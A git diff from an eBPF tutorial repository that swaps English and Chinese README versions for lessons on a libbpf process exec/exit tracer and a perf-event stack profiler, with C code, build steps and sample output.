+In addition, in the bootstrap.h file, we also define the data structures for interaction with user space: ```c /* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ @@ -303,7 +302,7 @@ struct event { #endif /* __BOOTSTRAP_H */ ``` -### 用户态,bootstrap.c +### User space, bootstrap.c ```c // SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) @@ -347,18 +346,18 @@ static error_t parse_arg(int key, char *arg, struct argp_state *state) case 'd': errno = 0; env.min_duration_ms = strtol(arg, NULL, 10); - if (errno || env.min_duration_ms <= 0) { - fprintf(stderr, "Invalid duration: %s\n", arg); - argp_usage(state); - } - break; - case ARGP_KEY_ARG: - argp_usage(state); - break; - default: - return ARGP_ERR_UNKNOWN; - } - return 0; + if (errno || env.min_duration_ms <= 0) { + fprintf(stderr, "Invalid duration: %s\n", arg); + argp_usage(state); +} +break; +case ARGP_KEY_ARG: + argp_usage(state); + break; +default: + return ARGP_ERR_UNKNOWN; +} +return 0; } static const struct argp argp = { @@ -458,7 +457,7 @@ int main(int argc, char **argv) /* Process events */ printf("%-8s %-5s %-16s %-7s %-7s %s\n", - "TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE"); + "TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE"); while (!exiting) { err = ring_buffer__poll(rb, 100 /* timeout, ms */); /* Ctrl-C will cause -EINTR */ @@ -481,9 +480,9 @@ cleanup: } ``` -这个用户态程序主要用于加载、验证、附加 eBPF 程序,以及接收 eBPF 程序收集的事件数据,并将其打印出来。我们将分析一些关键部分。 +This user-level program is mainly used to load, verify, attach eBPF programs, and receive event data collected by eBPF programs and print it out. We will analyze some key parts. -首先,我们定义了一个 env 结构,用于存储命令行参数: +First, we define an env structure to store command line arguments: ```c static struct env { @@ -492,7 +491,7 @@ static struct env { } env; ``` -接下来,我们使用 argp 库来解析命令行参数: +Next, we use the argp library to parse command line arguments: ```c static const struct argp_option opts[] = { @@ -513,17 +512,16 @@ static const struct argp argp = { }; ``` -main() 函数中,首先解析命令行参数,然后设置 libbpf 的打印回调函数 libbpf_print_fn,以便在需要时输出调试信息: +In the main() function, we first parse the command line arguments, and then set the libbpf print callback function libbpf_print_fn to output debug information when needed: ```c err = argp_parse(&argp, argc, argv, 0, NULL, NULL); if (err) return err; - libbpf_set_print(libbpf_print_fn); ``` -接下来,我们打开 eBPF 脚手架(skeleton)文件,将最小持续时间参数传递给 eBPF 程序,并加载和附加 eBPF 程序: +Next, we open the eBPF skeleton file, pass the minimum duration parameter to the eBPF program, and load and attach the eBPF program: ```c skel = bootstrap_bpf__open(); @@ -547,7 +545,7 @@ if (err) { } ``` -然后,我们创建一个环形缓冲区(ring buffer),用于接收 eBPF 程序发送的事件数据: +Then, we create a ring buffer to receive event data sent by the eBPF program: ```c rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL); @@ -558,9 +556,9 @@ if (!rb) { } ``` -handle_event() 函数会处理从 eBPF 程序收到的事件。根据事件类型(进程执行或退出),它会提取并打印事件信息,如时间戳、进程名、进程 ID、父进程 ID、文件名或退出代码等。 +The handle_event() function handles events received from the eBPF program. Depending on the event type (process execution or exit), it extracts and prints event information such as timestamp, process name, process ID, parent process ID, file name, or exit code. -最后,我们使用 ring_buffer__poll() 函数轮询环形缓冲区,处理收到的事件数据: +Finally, we use the ring_buffer__poll() function to poll the ring buffer and process the received event data: ```c while (!exiting) { @@ -569,7 +567,7 @@ while (!exiting) { } ``` -当程序收到 SIGINT 或 SIGTERM 信号时,它会最后完成清理、退出操作,关闭和卸载 eBPF 程序: +When the program receives the SIGINT or SIGTERM signal, it completes the final cleanup and exit operations, and closes and unloads the eBPF program: ```c cleanup: @@ -581,25 +579,25 @@ cleanup: } ``` -## 安装依赖 +## Dependency Installation -构建示例需要 clang、libelf 和 zlib。包名在不同的发行版中可能会有所不同。 +Building the example requires clang, libelf, and zlib. The package names may vary in different distributions. -在 Ubuntu/Debian 上,你需要执行以下命令: +On Ubuntu/Debian, you need to execute the following command: ```shell sudo apt install clang libelf1 libelf-dev zlib1g-dev ``` -在 CentOS/Fedora 上,你需要执行以下命令: +On CentOS/Fedora, you need to execute the following command: ```shell sudo dnf install clang elfutils-libelf elfutils-libelf-devel zlib-devel ``` -## 编译运行 +## Compile and Run -编译运行上述代码: +Compile and run the above code: ```console $ git submodule update --init --recursive @@ -614,15 +612,22 @@ TIME EVENT COMM PID PPID FILENAME/EXIT CODE 03:16:41 EXEC sh 110688 80168 /bin/sh 03:16:41 EXEC which 110689 110688 /usr/bin/which 03:16:41 EXIT which 110689 110688 [0] (0ms) -03:16:41 EXIT sh 110688 80168 [0] (0ms) -03:16:41 EXEC sh 110690 80168 /bin/sh -03:16:41 EXEC ps 110691 110690 /usr/bin/ps -03:16:41 EXIT ps 110691 110690 [0] (49ms) -03:16:41 EXIT sh 110690 80168 [0] (51ms) +03:16:41 EXIT sh 110688 80168 [0] (0ms)". ``` -## 总结 +The complete source code can be found at -通过这个实例,我们了解了如何将 eBPF 程序与用户态程序结合使用。这种结合为开发者提供了一个强大的工具集,可以实现跨内核和用户空间的高效数据收集和处理。通过使用 eBPF 和 libbpf,您可以构建更高效、可扩展和安全的监控和性能分析工具。 +## Summary -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +Through this example, we have learned how to combine eBPF programs with user-space programs. This combination provides developers with a powerful toolkit for efficient data collection and processing across the kernel and user space. By using eBPF and libbpf, you can build more efficient, scalable, and secure monitoring and performance analysis tools. + +In the following tutorials, we will continue to explore the advanced features of eBPF and share more about eBPF development practices. Through continuous learning and practice, you will have a better understanding and mastery of eBPF technology and apply it to solve real-world problems. + +If you would like to learn more about eBPF knowledge and practices, please refer to the official documentation of eunomia-bpf: . You can also visit our tutorial code repository at or website for more examples and complete tutorials. + +## Reference + +- [Building BPF applications with libbpf-bootstrap](https://nakryiko.com/posts/libbpf-bootstrap/) +- + +> The original link of this article: diff --git a/src/11-bootstrap/README_en.md b/src/11-bootstrap/README.zh.md similarity index 53% rename from src/11-bootstrap/README_en.md rename to src/11-bootstrap/README.zh.md index 0970a50..48ea26f 100644 --- a/src/11-bootstrap/README_en.md +++ b/src/11-bootstrap/README.zh.md @@ -1,41 +1,41 @@ -# eBPF Tutorial by Example 11: Develop User-Space Programs with libbpf and Trace exec() and exit() +# eBPF 入门开发实践教程十一:在 eBPF 中使用 libbpf 开发用户态程序并跟踪 exec() 和 exit() 系统调用 -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code during kernel runtime. +eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 -In this tutorial, we will learn how kernel-space and user-space eBPF programs work together. We will also learn how to use the native libbpf to develop user-space programs, package eBPF applications into executable files, and distribute them across different kernel versions. +在本教程中,我们将了解内核态和用户态的 eBPF 程序是如何协同工作的。我们还将学习如何使用原生的 libbpf 开发用户态程序,将 eBPF 应用打包为可执行文件,实现跨内核版本分发。 -## The libbpf Library and Why We Need to Use It +## libbpf 库,以及为什么需要使用它 -libbpf is a C language library that is distributed with the kernel version to assist in loading and running eBPF programs. It provides a set of C APIs for interacting with the eBPF system, allowing developers to write user-space programs more easily to load and manage eBPF programs. These user-space programs are typically used for system performance analysis, monitoring, or optimization. +libbpf 是一个 C 语言库,伴随内核版本分发,用于辅助 eBPF 程序的加载和运行。它提供了用于与 eBPF 系统交互的一组 C API,使开发者能够更轻松地编写用户态程序来加载和管理 eBPF 程序。这些用户态程序通常用于分析、监控或优化系统性能。 -There are several advantages to using the libbpf library: +使用 libbpf 库有以下优势: -- It simplifies the process of loading, updating, and running eBPF programs. -- It provides a set of easy-to-use APIs, allowing developers to focus on writing core logic instead of dealing with low-level details. -- It ensures compatibility with the eBPF subsystem in the kernel, reducing maintenance costs. +- 它简化了 eBPF 程序的加载、更新和运行过程。 +- 它提供了一组易于使用的 API,使开发者能够专注于编写核心逻辑,而不是处理底层细节。 +- 它能够确保与内核中的 eBPF 子系统的兼容性,降低了维护成本。 -At the same time, libbpf and BTF (BPF Type Format) are important components of the eBPF ecosystem. They play critical roles in achieving compatibility across different kernel versions. BTF is a metadata format used to describe type information in eBPF programs. The primary purpose of BTF is to provide a structured way to describe data structures in the kernel so that eBPF programs can access and manipulate them more easily. +同时,libbpf 和 BTF(BPF Type Format)都是 eBPF 生态系统的重要组成部分。它们各自在实现跨内核版本兼容方面发挥着关键作用。BTF(BPF Type Format)是一种元数据格式,用于描述 eBPF 程序中的类型信息。BTF 的主要目的是提供一种结构化的方式,以描述内核中的数据结构,以便 eBPF 程序可以更轻松地访问和操作它们。 -The key roles of BTF in achieving compatibility across different kernel versions are as follows: +BTF 在实现跨内核版本兼容方面的关键作用如下: -- BTF allows eBPF programs to access detailed type information of kernel data structures without hardcoding specific kernel versions. This enables eBPF programs to adapt to different kernel versions, achieving compatibility across kernel versions. -- By using BPF CO-RE (Compile Once, Run Everywhere) technology, eBPF programs can leverage BTF to parse the type information of kernel data structures during compilation, thereby generating eBPF programs that can run on different kernel versions. +- BTF 允许 eBPF 程序访问内核数据结构的详细类型信息,而无需对特定内核版本进行硬编码。这使得 eBPF 程序可以适应不同版本的内核,从而实现跨内核版本兼容。 +- 通过使用 BPF CO-RE(Compile Once, Run Everywhere)技术,eBPF 程序可以利用 BTF 在编译时解析内核数据结构的类型信息,进而生成可以在不同内核版本上运行的 eBPF 程序。 -By combining libbpf and BTF, eBPF programs can run on various kernel versions without the need for separate compilation for each kernel version. This greatly improves the portability and compatibility of the eBPF ecosystem and reduces the difficulty of development and maintenance. +结合 libbpf 和 BTF,eBPF 程序可以在各种不同版本的内核上运行,而无需为每个内核版本单独编译。这极大地提高了 eBPF 生态系统的可移植性和兼容性,降低了开发和维护的难度。 -## What is Bootstrap +## 什么是 bootstrap -Bootstrap is a complete application that utilizes libbpf. It uses eBPF programs to trace the exec() system call in the kernel (handled by the SEC("tp/sched/sched_process_exec") handle_exec BPF program), which mainly corresponds to the creation of new processes (excluding the fork() part). In addition, it also traces the exit() system call of processes (handled by the SEC("tp/sched/sched_process_exit") handle_exit BPF program) to understand when each process exits. +Bootstrap 是一个使用 libbpf 的完整应用,它利用 eBPF 程序来跟踪内核中的 exec() 系统调用(通过 SEC("tp/sched/sched_process_exec") handle_exec BPF 程序),这主要对应于新进程的创建(不包括 fork() 部分)。此外,它还跟踪进程的 exit() 系统调用(通过 SEC("tp/sched/sched_process_exit") handle_exit BPF 程序),以了解每个进程何时退出。 -These two BPF programs work together to capture interesting information about new processes, such as the file name of the binary and measure the lifecycle of processes. They also collect interesting statistics, such as exit codes or resource consumption, when a process exits. This is a good starting point to gain a deeper understanding of the inner workings of the kernel and observe how things actually operate. +这两个 BPF 程序共同工作,允许捕获关于新进程的有趣信息,例如二进制文件的文件名,以及测量进程的生命周期,并在进程结束时收集有趣的统计信息,例如退出代码或消耗的资源量等。这是深入了解内核内部并观察事物如何真正运作的良好起点。 -Bootstrap also uses the argp API (part of libc) for command-line argument parsing, allowing users to configure the behavior of the application through command-line options. This provides flexibility and allows users to customize the program behavior according to their specific needs. While these functionalities can also be achieved using the eunomia-bpf tool, using libbpf here provides higher scalability in user space at the cost of additional complexity. +Bootstrap 还使用 argp API(libc 的一部分)进行命令行参数解析,使得用户可以通过命令行选项配置应用行为。这种方式提供了灵活性,让用户能够根据实际需求自定义程序行为。虽然这些功能使用 eunomia-bpf 工具也可以实现,但是这里我们使用 libbpf 可以在用户态提供更高的可扩展性,不过也带来了不少额外的复杂度。 ## Bootstrap -Bootstrap consists of two parts: kernel space and user space. The kernel space part is an eBPF program that traces the exec() and exit() system calls. The user space part is a C language program that uses the libbpf library to load and run the kernel space program and process the data collected from the kernel space program. +Bootstrap 分为两个部分:内核态和用户态。内核态部分是一个 eBPF 程序,它跟踪 exec() 和 exit() 系统调用。用户态部分是一个 C 语言程序,它使用 libbpf 库来加载和运行内核态程序,并处理从内核态程序收集的数据。 -### Kernel-space eBPF Program bootstrap.bpf.c +### 内核态 eBPF 程序 bootstrap.bpf.c ```c // SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause @@ -108,7 +108,7 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) struct event *e; pid_t pid, tid; u64 id, ts, *start_ts, duration_ns = 0; - + /* get PID and TID of exiting thread/process */ id = bpf_get_current_pid_tgid(); pid = id >> 32; @@ -120,7 +120,8 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) /* if we recorded start of the process, calculate lifetime duration */ start_ts = bpf_map_lookup_elem(&exec_start, &pid); - if (start_ts)duration_ns = bpf_ktime_get_ns() - *start_ts; + if (start_ts) + duration_ns = bpf_ktime_get_ns() - *start_ts; else if (min_duration_ns) return 0; bpf_map_delete_elem(&exec_start, &pid); @@ -150,9 +151,9 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) } ``` -This code is a kernel-level eBPF program (`bootstrap.bpf.c`) used to trace `exec()` and `exit()` system calls. It captures process creation and exit events using an eBPF program and sends the relevant information to a user-space program for processing. Below is a detailed explanation of the code. +这段代码是一个内核态 eBPF 程序(bootstrap.bpf.c),主要用于跟踪 exec() 和 exit() 系统调用。它通过 eBPF 程序捕获进程的创建和退出事件,并将相关信息发送到用户态程序进行处理。下面是对代码的详细解释。 -First, we include the necessary headers and define the license for the eBPF program. We also define two eBPF maps: `exec_start` and `rb`. `exec_start` is a hash type eBPF map used to store the timestamp when a process starts executing. `rb` is a ring buffer type eBPF map used to store captured event data and send it to the user-space program. +首先,我们引入所需的头文件,定义 eBPF 程序的许可证以及两个 eBPF maps:exec_start 和 rb。exec_start 是一个哈希类型的 eBPF map,用于存储进程开始执行时的时间戳。rb 是一个环形缓冲区类型的 eBPF map,用于存储捕获的事件数据,并将其发送到用户态程序。 ```c #include "vmlinux.h" @@ -178,7 +179,7 @@ struct { const volatile unsigned long long min_duration_ns = 0; ``` -Next, we define an eBPF program named `handle_exec` which is triggered when a process executes the `exec()` system call. First, we retrieve the PID from the current process, record the timestamp when the process starts executing, and store it in the `exec_start` map. +接下来,我们定义了一个名为 handle_exec 的 eBPF 程序,它会在进程执行 exec() 系统调用时触发。首先,我们从当前进程中获取 PID,记录进程开始执行的时间戳,然后将其存储在 exec_start map 中。 ```c SEC("tp/sched/sched_process_exec") @@ -193,7 +194,7 @@ int handle_exec(struct trace_event_raw_sched_process_exec *ctx) } ``` -Then, we reserve an event structure from the circular buffer map `rb` and fill in the relevant data, such as the process ID, parent process ID, and process name. Afterwards, we send this data to the user-mode program for processing. +然后,我们从环形缓冲区 map rb 中预留一个事件结构,并填充相关数据,如进程 ID、父进程 ID、进程名等。之后,我们将这些数据发送到用户态程序进行处理。 ```c // reserve sample from BPF ringbuf @@ -217,7 +218,7 @@ Then, we reserve an event structure from the circular buffer map `rb` and fill i return 0; ``` -Finally, we define an eBPF program named `handle_exit` that will be triggered when a process executes the `exit()` system call. First, we retrieve the PID and TID (thread ID) from the current process. If the PID and TID are not equal, it means that this is a thread exit, and we will ignore this event. +最后,我们定义了一个名为 handle_exit 的 eBPF 程序,它会在进程执行 exit() 系统调用时触发。首先,我们从当前进程中获取 PID 和 TID(线程 ID)。如果 PID 和 TID 不相等,说明这是一个线程退出,我们将忽略此事件。 ```c SEC("tp/sched/sched_process_exit") @@ -236,7 +237,7 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) } ``` -Next, we look up the timestamp of when the process started execution, which was previously stored in the `exec_start` map. If a timestamp is found, we calculate the process's lifetime duration and then remove the record from the `exec_start` map. If a timestamp is not found and a minimum duration is specified, we return directly. +接着,我们查找之前存储在 exec_start map 中的进程开始执行的时间戳。如果找到了时间戳,我们将计算进程的生命周期(持续时间),然后从 exec_start map 中删除该记录。如果未找到时间戳且指定了最小持续时间,则直接返回。 ```c // if we recorded start of the process, calculate lifetime duration @@ -252,7 +253,7 @@ Next, we look up the timestamp of when the process started execution, which was return 0; ``` -Then, we reserve an event structure from the circular buffer map `rb` and fill in the relevant data, such as the process ID, parent process ID, process name, and process duration. Finally, we send this data to the user-mode program for processing. +然后,我们从环形缓冲区 map rb 中预留一个事件结构,并填充相关数据,如进程 ID、父进程 ID、进程名、进程持续时间等。最后,我们将这些数据发送到用户态程序进行处理。 ```c /* reserve sample from BPF ringbuf */ @@ -264,21 +265,21 @@ Then, we reserve an event structure from the circular buffer map `rb` and fill i task = (struct task_struct *)bpf_get_current_task(); e->exit_event = true; - e->duration_ns = duration_ns;``` -e->pid = pid; -e->ppid = BPF_CORE_READ(task, real_parent, tgid); -e->exit_code = (BPF_CORE_READ(task, exit_code) >> 8) & 0xff; -bpf_get_current_comm(&e->comm, sizeof(e->comm)); + e->duration_ns = duration_ns; + e->pid = pid; + e->ppid = BPF_CORE_READ(task, real_parent, tgid); + e->exit_code = (BPF_CORE_READ(task, exit_code) >> 8) & 0xff; + bpf_get_current_comm(&e->comm, sizeof(e->comm)); -/* send data to user-space for post-processing */ -bpf_ringbuf_submit(e, 0); -return 0; + /* send data to user-space for post-processing */ + bpf_ringbuf_submit(e, 0); + return 0; } ``` -This way, when a process executes the exec() or exit() system calls, our eBPF program captures the corresponding events and sends detailed information to the user space program for further processing. This allows us to easily monitor process creation and termination and obtain detailed information about the processes. +这样,当进程执行 exec() 或 exit() 系统调用时,我们的 eBPF 程序会捕获相应的事件,并将详细信息发送到用户态程序进行后续处理。这使得我们可以轻松地监控进程的创建和退出,并获取有关进程的详细信息。 -In addition, in the bootstrap.h file, we also define the data structures for interaction with user space: +除此之外,在 bootstrap.h 中,我们还定义了和用户态交互的数据结构: ```c /* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ @@ -302,7 +303,7 @@ struct event { #endif /* __BOOTSTRAP_H */ ``` -### User space, bootstrap.c +### 用户态,bootstrap.c ```c // SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) @@ -346,18 +347,18 @@ static error_t parse_arg(int key, char *arg, struct argp_state *state) case 'd': errno = 0; env.min_duration_ms = strtol(arg, NULL, 10); - if (errno || env.min_duration_ms <= 0) { - fprintf(stderr, "Invalid duration: %s\n", arg); - argp_usage(state); -} -break; -case ARGP_KEY_ARG: - argp_usage(state); - break; -default: - return ARGP_ERR_UNKNOWN; -} -return 0; + if (errno || env.min_duration_ms <= 0) { + fprintf(stderr, "Invalid duration: %s\n", arg); + argp_usage(state); + } + break; + case ARGP_KEY_ARG: + argp_usage(state); + break; + default: + return ARGP_ERR_UNKNOWN; + } + return 0; } static const struct argp argp = { @@ -457,7 +458,7 @@ int main(int argc, char **argv) /* Process events */ printf("%-8s %-5s %-16s %-7s %-7s %s\n", - "TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE"); + "TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE"); while (!exiting) { err = ring_buffer__poll(rb, 100 /* timeout, ms */); /* Ctrl-C will cause -EINTR */ @@ -480,9 +481,9 @@ cleanup: } ``` -This user-level program is mainly used to load, verify, attach eBPF programs, and receive event data collected by eBPF programs and print it out. We will analyze some key parts. +这个用户态程序主要用于加载、验证、附加 eBPF 程序,以及接收 eBPF 程序收集的事件数据,并将其打印出来。我们将分析一些关键部分。 -First, we define an env structure to store command line arguments: +首先,我们定义了一个 env 结构,用于存储命令行参数: ```c static struct env { @@ -491,7 +492,7 @@ static struct env { } env; ``` -Next, we use the argp library to parse command line arguments: +接下来,我们使用 argp 库来解析命令行参数: ```c static const struct argp_option opts[] = { @@ -512,16 +513,17 @@ static const struct argp argp = { }; ``` -In the main() function, we first parse the command line arguments, and then set the libbpf print callback function libbpf_print_fn to output debug information when needed: +main() 函数中,首先解析命令行参数,然后设置 libbpf 的打印回调函数 libbpf_print_fn,以便在需要时输出调试信息: ```c err = argp_parse(&argp, argc, argv, 0, NULL, NULL); if (err) return err; + libbpf_set_print(libbpf_print_fn); ``` -Next, we open the eBPF skeleton file, pass the minimum duration parameter to the eBPF program, and load and attach the eBPF program: +接下来,我们打开 eBPF 脚手架(skeleton)文件,将最小持续时间参数传递给 eBPF 程序,并加载和附加 eBPF 程序: ```c skel = bootstrap_bpf__open(); @@ -545,7 +547,7 @@ if (err) { } ``` -Then, we create a ring buffer to receive event data sent by the eBPF program: +然后,我们创建一个环形缓冲区(ring buffer),用于接收 eBPF 程序发送的事件数据: ```c rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL); @@ -556,9 +558,9 @@ if (!rb) { } ``` -The handle_event() function handles events received from the eBPF program. Depending on the event type (process execution or exit), it extracts and prints event information such as timestamp, process name, process ID, parent process ID, file name, or exit code. +handle_event() 函数会处理从 eBPF 程序收到的事件。根据事件类型(进程执行或退出),它会提取并打印事件信息,如时间戳、进程名、进程 ID、父进程 ID、文件名或退出代码等。 -Finally, we use the ring_buffer__poll() function to poll the ring buffer and process the received event data: +最后,我们使用 ring_buffer__poll() 函数轮询环形缓冲区,处理收到的事件数据: ```c while (!exiting) { @@ -567,7 +569,7 @@ while (!exiting) { } ``` -When the program receives the SIGINT or SIGTERM signal, it completes the final cleanup and exit operations, and closes and unloads the eBPF program: +当程序收到 SIGINT 或 SIGTERM 信号时,它会最后完成清理、退出操作,关闭和卸载 eBPF 程序: ```c cleanup: @@ -579,25 +581,25 @@ cleanup: } ``` -## Dependency Installation +## 安装依赖 -Building the example requires clang, libelf, and zlib. The package names may vary in different distributions. +构建示例需要 clang、libelf 和 zlib。包名在不同的发行版中可能会有所不同。 -On Ubuntu/Debian, you need to execute the following command: +在 Ubuntu/Debian 上,你需要执行以下命令: ```shell sudo apt install clang libelf1 libelf-dev zlib1g-dev ``` -On CentOS/Fedora, you need to execute the following command: +在 CentOS/Fedora 上,你需要执行以下命令: ```shell sudo dnf install clang elfutils-libelf elfutils-libelf-devel zlib-devel ``` -## Compile and Run +## 编译运行 -Compile and run the above code: +编译运行上述代码: ```console $ git submodule update --init --recursive @@ -612,22 +614,15 @@ TIME EVENT COMM PID PPID FILENAME/EXIT CODE 03:16:41 EXEC sh 110688 80168 /bin/sh 03:16:41 EXEC which 110689 110688 /usr/bin/which 03:16:41 EXIT which 110689 110688 [0] (0ms) -03:16:41 EXIT sh 110688 80168 [0] (0ms)". +03:16:41 EXIT sh 110688 80168 [0] (0ms) +03:16:41 EXEC sh 110690 80168 /bin/sh +03:16:41 EXEC ps 110691 110690 /usr/bin/ps +03:16:41 EXIT ps 110691 110690 [0] (49ms) +03:16:41 EXIT sh 110690 80168 [0] (51ms) ``` -The complete source code can be found at +## 总结 -## Summary +通过这个实例,我们了解了如何将 eBPF 程序与用户态程序结合使用。这种结合为开发者提供了一个强大的工具集,可以实现跨内核和用户空间的高效数据收集和处理。通过使用 eBPF 和 libbpf,您可以构建更高效、可扩展和安全的监控和性能分析工具。 -Through this example, we have learned how to combine eBPF programs with user-space programs. This combination provides developers with a powerful toolkit for efficient data collection and processing across the kernel and user space. By using eBPF and libbpf, you can build more efficient, scalable, and secure monitoring and performance analysis tools. - -In the following tutorials, we will continue to explore the advanced features of eBPF and share more about eBPF development practices. Through continuous learning and practice, you will have a better understanding and mastery of eBPF technology and apply it to solve real-world problems. - -If you would like to learn more about eBPF knowledge and practices, please refer to the official documentation of eunomia-bpf: . You can also visit our tutorial code repository at or website for more examples and complete tutorials. - -## Reference - -- [Building BPF applications with libbpf-bootstrap](https://nakryiko.com/posts/libbpf-bootstrap/) -- - -> The original link of this article: +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/12-profile/README.md b/src/12-profile/README.md index d1f73f5..c6a825f 100644 --- a/src/12-profile/README.md +++ b/src/12-profile/README.md @@ -1,23 +1,23 @@ -# eBPF 入门实践教程十二:使用 eBPF 程序 profile 进行性能分析 +# eBPF Tutorial by Example 12: Using eBPF Program Profile for Performance Analysis -本教程将指导您使用 libbpf 和 eBPF 程序进行性能分析。我们将利用内核中的 perf 机制,学习如何捕获函数的执行时间以及如何查看性能数据。 +This tutorial will guide you on using libbpf and eBPF programs for performance analysis. We will leverage the perf mechanism in the kernel to learn how to capture the execution time of functions and view performance data. -libbpf 是一个用于与 eBPF 交互的 C 库。它提供了创建、加载和使用 eBPF 程序所需的基本功能。本教程中,我们将主要使用 libbpf 完成开发工作。perf 是 Linux 内核中的性能分析工具,允许用户测量和分析内核及用户空间程序的性能,以及获取对应的调用堆栈。它利用内核中的硬件计数器和软件事件来收集性能数据。 +libbpf is a C library for interacting with eBPF. It provides the basic functionality for creating, loading, and using eBPF programs. In this tutorial, we will mainly use libbpf for development. Perf is a performance analysis tool in the Linux kernel that allows users to measure and analyze the performance of kernel and user space programs, as well as obtain corresponding call stacks. It collects performance data using hardware counters and software events in the kernel. -## eBPF 工具:profile 性能分析示例 +## eBPF Tool: profile Performance Analysis Example -`profile` 工具基于 eBPF 实现,利用 Linux 内核中的 perf 事件进行性能分析。`profile` 工具会定期对每个处理器进行采样,以便捕获内核函数和用户空间函数的执行。它可以显示栈回溯的以下信息: +The `profile` tool is implemented based on eBPF and utilizes the perf events in the Linux kernel for performance analysis. The `profile` tool periodically samples each processor to capture the execution of kernel and user space functions. It provides the following information for stack traces: -- 地址:函数调用的内存地址 -- 符号:函数名称 -- 文件名:源代码文件名称 -- 行号:源代码中的行号 +- Address: memory address of the function call +- Symbol: function name +- File Name: name of the source code file +- Line Number: line number in the source code -这些信息有助于开发人员定位性能瓶颈和优化代码。更进一步,可以通过这些对应的信息生成火焰图,以便更直观的查看性能数据。 +This information helps developers locate performance bottlenecks and optimize code. Furthermore, flame graphs can be generated based on this information for a more intuitive view of performance data. -在本示例中,可以通过 libbpf 库编译运行它(以 Ubuntu/Debian 为例): +In this example, you can compile and run it with the libbpf library (using Ubuntu/Debian as an example): -**NOTE:** 首先需要安装 `cargo` 才能编译得到 `profile`, 安装方法可以参考[Cargo 手册](https://rustwiki.org/en/cargo/getting-started/installation.html) +**NOTE:** To compile the `profile`, you first need to install `Cargo`, as shown in ["The Cargo Book"](https://rustwiki.org/en/cargo/getting-started/installation.html) ```console $ git submodule update --init --recursive @@ -45,13 +45,13 @@ Userspace: 1 [<0000556dec34cad0>] ``` -## 实现原理 +## Implementation Principle -profile 工具由两个部分组成,内核态中的 eBPF 程序和用户态中的 `profile` 符号处理程序。`profile` 符号处理程序负责加载 eBPF 程序,以及处理 eBPF 程序输出的数据。 +The `profile` tool consists of two parts: the eBPF program in kernel space and the `profile` symbol handling program in user space. The `profile` symbol handling program is responsible for loading the eBPF program and processing the data outputted by the eBPF program. -### 内核态部分 +### Kernel Space Part -内核态 eBPF 程序的实现逻辑主要是借助 perf event,对程序的堆栈进行定时采样,从而捕获程序的执行流程。 +The implementation logic of the eBPF program in kernel space mainly relies on perf events to periodically sample the stack of the program, thereby capturing its execution flow. ```c // SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause @@ -98,88 +98,87 @@ int profile(void *ctx) } ``` -接下来,我们将重点讲解内核态代码的关键部分。 +Next, we will focus on the key part of the kernel code. -1. 定义 eBPF maps `events`: +1. Define eBPF maps `events`: - ```c +```c +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} events SEC(".maps"); +``` - struct { - __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 256 * 1024); - } events SEC(".maps"); - ``` +Here, a eBPF maps of type `BPF_MAP_TYPE_RINGBUF` is defined. The Ring Buffer is a high-performance circular buffer used to transfer data between the kernel and user space. `max_entries` sets the maximum size of the Ring Buffer. - 这里定义了一个类型为 `BPF_MAP_TYPE_RINGBUF` 的 eBPF maps 。Ring Buffer 是一种高性能的循环缓冲区,用于在内核和用户空间之间传输数据。`max_entries` 设置了 Ring Buffer 的最大大小。 +2. Define `perf_event` eBPF program: -2. 定义 `perf_event` eBPF 程序: +```c +SEC("perf_event") +int profile(void *ctx) +``` - ```c - SEC("perf_event") - int profile(void *ctx) - ``` +Here, a eBPF program named `profile` is defined, which will be executed when a perf event is triggered. - 这里定义了一个名为 `profile` 的 eBPF 程序,它将在 perf 事件触发时执行。 +3. Get process ID and CPU ID: -3. 获取进程 ID 和 CPU ID: +```c +int pid = bpf_get_current_pid_tgid() >> 32; +int cpu_id = bpf_get_smp_processor_id(); +``` - ```c - int pid = bpf_get_current_pid_tgid() >> 32; - int cpu_id = bpf_get_smp_processor_id(); - ``` +The function `bpf_get_current_pid_tgid()` returns the PID and TID of the current process. By right shifting 32 bits, we get the PID. The function `bpf_get_smp_processor_id()` returns the ID of the current CPU. - `bpf_get_current_pid_tgid()` 函数返回当前进程的 PID 和 TID,通过右移 32 位,我们得到 PID。`bpf_get_smp_processor_id()` 函数返回当前 CPU 的 ID。 +4. Reserve space in the Ring Buffer: -4. 预留 Ring Buffer 空间: +```c +event = bpf_ringbuf_reserve(&events, sizeof(*event), 0); +if (!event) + return 1; +``` - ```c - event = bpf_ringbuf_reserve(&events, sizeof(*event), 0); - if (!event) - return 1; - ``` +Use the `bpf_ringbuf_reserve()` function to reserve space in the Ring Buffer for storing the collected stack information. If the reservation fails, return an error. - 通过 `bpf_ringbuf_reserve()` 函数预留 Ring Buffer 空间,用于存储采集的栈信息。若预留失败,返回错误. +5. Get the current process name: -5. 获取当前进程名: +```c - ```c +if (bpf_get_current_comm(event->comm, sizeof(event->comm))) + event->comm[0] = 0; +``` - if (bpf_get_current_comm(event->comm, sizeof(event->comm))) - event->comm[0] = 0; - ``` +Use the `bpf_get_current_comm()` function to get the current process name and store it in 